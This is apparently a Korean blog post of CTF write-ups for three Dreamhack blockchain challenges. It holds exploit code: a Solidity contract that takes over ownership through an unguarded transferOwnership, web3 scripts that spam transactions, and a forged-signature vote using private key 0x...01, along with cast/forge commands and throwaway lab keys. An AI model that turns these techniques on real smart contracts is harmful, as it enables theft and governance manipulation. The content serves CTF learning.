<-->

 

 

ExcellentMember

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "./Ownable.sol";

contract ExcellentMember is Ownable {
    bool public solved;

    mapping(address => bool) public join;
    mapping(address => bool) public excellentMember;

    address[] public excellentMembers;

    constructor() Ownable(msg.sender) {
        excellentMember[address(this)] = true;
        excellentMembers.push(address(this));    
    }

    function adminCall(address target, bytes memory data) external payable onlyOwner returns (bytes memory) {
        (bool success, bytes memory returnData) = target.call{value: msg.value}(data);
        require(success, "Fail Low-Level call");
        return returnData;
    }

    function setJoin(bool opinion) external {
        join[msg.sender] = opinion;
    }

    function registryExcellentMember(address member) external { // adminCall로 진입
        require(!excellentMember[member], "Already excellent member");
        require(join[member], "Set join");
        require(excellentMember[msg.sender] == true, "Only excellent member");
        excellentMember[member] = true;
        excellentMembers.push(member);
    }

    function solve() external {
        if (excellentMember[tx.origin] == true) {
            solved = true;
        }
    }
}
// {
//   "message": {
//     "level_contract_address": "0xB45031cA2f47AEa0a3bC6AC6d6f941bb07E18451",
//     "user_private_key": "0x57c0b9d2af1583e8eafde9e4e3dee1ba4fffc2fb40bbf87f1950d748800090d8",
//     "user_address": "0xD2d66D72780D836919f3066d483f58890A035A08"
//   }
// }
// http://host6.dreamhack.games:22022/383fe87a2e65/rpc
// cast send --private-key 0x57c0b9d2af1583e8eafde9e4e3dee1ba4fffc2fb40bbf87f1950d748800090d8 --rpc-url http://host6.dreamhack.games:22022/383fe87a2e65/rpc 0xB45031cA2f47AEa0a3bC6AC6d6f941bb07E18451 "setJoin(bool)" true
// 1. 외부에서 EoA로 setJoin하고
 
// 2. adminCall로 EoA excellentMember 등록
// forge create Solve --private-key 0x57c0b9d2af1583e8eafde9e4e3dee1ba4fffc2fb40bbf87f1950d748800090d8 --rpc-url http://host6.dreamhack.games:22022/383fe87a2e65/rpc --constructor-args 0xB45031cA2f47AEa0a3bC6AC6d6f941bb07E18451

// 3. EoA로 solve 호출
// cast send --private-key 0x57c0b9d2af1583e8eafde9e4e3dee1ba4fffc2fb40bbf87f1950d748800090d8 --rpc-url http://host6.dreamhack.games:22022/383fe87a2e65/rpc 0xB45031cA2f47AEa0a3bC6AC6d6f941bb07E18451 "solve()"

contract Solve {
    ExcellentMember public chall;

    constructor (address _chall) {
        chall = ExcellentMember(_chall);
        chall.transferOwnership(address(this));
        bytes memory data = abi.encodeWithSignature("registryExcellentMember(address)", address(msg.sender)); 
        chall.adminCall(address(chall), data);
    }
}

 

 

 

 

DreamIdle

from web3 import Web3
import json
import time
w3 = Web3(Web3.HTTPProvider("http://host6.dreamhack.games:22237/cd5c806e8a7e/rpc"))
#Check Connection
t=w3.is_connected()
print(t)

# Get private key 
prikey = '0x3a2c14bc8b0a2fecad0093b1df71a5e7caf2d082b243b429550a7325a6b76a3f'
challenge_addr = "0xb5f33218b54489b6Cf362Be88C40F54AcaA13642"


initGame_0 = "c869ce640000000000000000000000000000000000000000000000000000000000000000"
initGame_1 = "c869ce640000000000000000000000000000000000000000000000000000000000000001"
sleep_1 = "fa9d87130000000000000000000000000000000000000000000000000000000000000001"
feed_0 = "f59dfdfb0000000000000000000000000000000000000000000000000000000000000000"
feed_1 = "f59dfdfb0000000000000000000000000000000000000000000000000000000000000001"
study_1 = "202457340000000000000000000000000000000000000000000000000000000000000001"
levelup_1 = "0ce90ec20000000000000000000000000000000000000000000000000000000000000001"
solve_1 = "b8b8d35a0000000000000000000000000000000000000000000000000000000000000001"

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address

my_nonce = w3.eth.get_transaction_count(myAddr)
gasPrice = w3.eth.gas_price
chainId = w3.eth.chain_id

def send_tx(value, data):
    global my_nonce, chainId, gasPrice, myAddr
    func_call = {
        "from": myAddr,
        "to": challenge_addr,
        "nonce": my_nonce,
        "gasPrice": gasPrice,
        "value": value,
        "chainId": chainId,
        "data": data,
        "gas": 30000000
    }
    my_nonce = my_nonce + 1
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    w3.eth.send_raw_transaction(signed_tx.rawTransaction)

send_tx(0, initGame_0)
send_tx(0, feed_0)
send_tx(0, initGame_1)

for i in range(150):
    send_tx(0, feed_1)
    send_tx(0, study_1)
    send_tx(0, study_1)
    send_tx(0, study_1)
    send_tx(0, sleep_1)
    print(i)

send_tx(0, levelup_1)
print("level_up")

for i in range(150):
    send_tx(0, feed_1)
    send_tx(0, study_1)
    send_tx(0, study_1)
    send_tx(0, study_1)
    send_tx(0, sleep_1)
    print(i)

send_tx(0, levelup_1)
send_tx(10**18, solve_1)

 

 

 

MagicVote

from web3 import Web3, HTTPProvider
from eth_account import Account
from eth_account.messages import encode_defunct


w3 = Web3(Web3.HTTPProvider("http://host3.dreamhack.games:11867/d738f32dc72c/rpc"))


#Check Connection
t=w3.is_connected()
print(t)


# Get private key 
prikey = '0xb18184dd52cc15b7a86e2fc22e13f28d32162596b8c19a7a918cdd6db1b319b6'
challenge_addr = "0xbf8736b83ee325A550F06918aE59D5bB63C9D807"

PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address





f = open("abi.json", "r"); contract_abi= f.read(); f.close()

contract = w3.eth.contract(abi=contract_abi, address=challenge_addr)


# 개인 키 설정
private_key = '0x0000000000000000000000000000000000000000000000000000000000000001'

# 함수 시그니처와 데이터 준비
function_signature = bytes.fromhex('9abe73cf')

# 데이터 포맷에 맞게 인코딩
data = function_signature + b'\x00' * 32 + b'\x01'.rjust(32, b'\x00')

print(data.hex())



import os
from ecdsa import SigningKey, SECP256k1, util
from Crypto.Hash import _keccak
sk = SigningKey.from_string(bytes.fromhex(private_key[2:]), curve=SECP256k1)

for _ in range(6):

    # 메시지 준비

    # 직접 지정한 nonce 값
    nonce = os.urandom(32)  

    # nonce를 사용하여 서명 생성
    signature = sk.sign_digest(w3.keccak(data))

    r = int.from_bytes(signature[:32], byteorder='big')
    s = int.from_bytes(signature[32:64], byteorder='big')

    for v in [27, 28]:
            pub_key = Account._recover_hash(message_hash=w3.keccak(data), vrs=(v, r, s))
            if pub_key == Account.from_key(bytes.fromhex(private_key[2:])).address:
                print("Match found with v:", v)
                print(f"r: {hex(r)}, s: {hex(s)}, v: {v}")
                func_call = contract.functions["vote"](0, True, v, signature[:32], signature[32:64]).build_transaction({
                    "from": myAddr,
                    "nonce": w3.eth.get_transaction_count(myAddr),
                    "gasPrice": w3.eth.gas_price,
                    "chainId": w3.eth.chain_id,
                })
                signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
                result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
                transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
                print(transaction_receipt)
                break

'writeups' 카테고리의 다른 글

justctf2024 teaser  (0) 2024.06.17
codegate 2024 quals  (0) 2024.06.03
osu!gaming 2024 - blockchain  (0) 2024.03.04
GCC CTF 2024 - web3  (0) 2024.03.04
LACTF 2024 - zerocoin, remi-s world  (0) 2024.02.19

+ Recent posts

티스토리툴바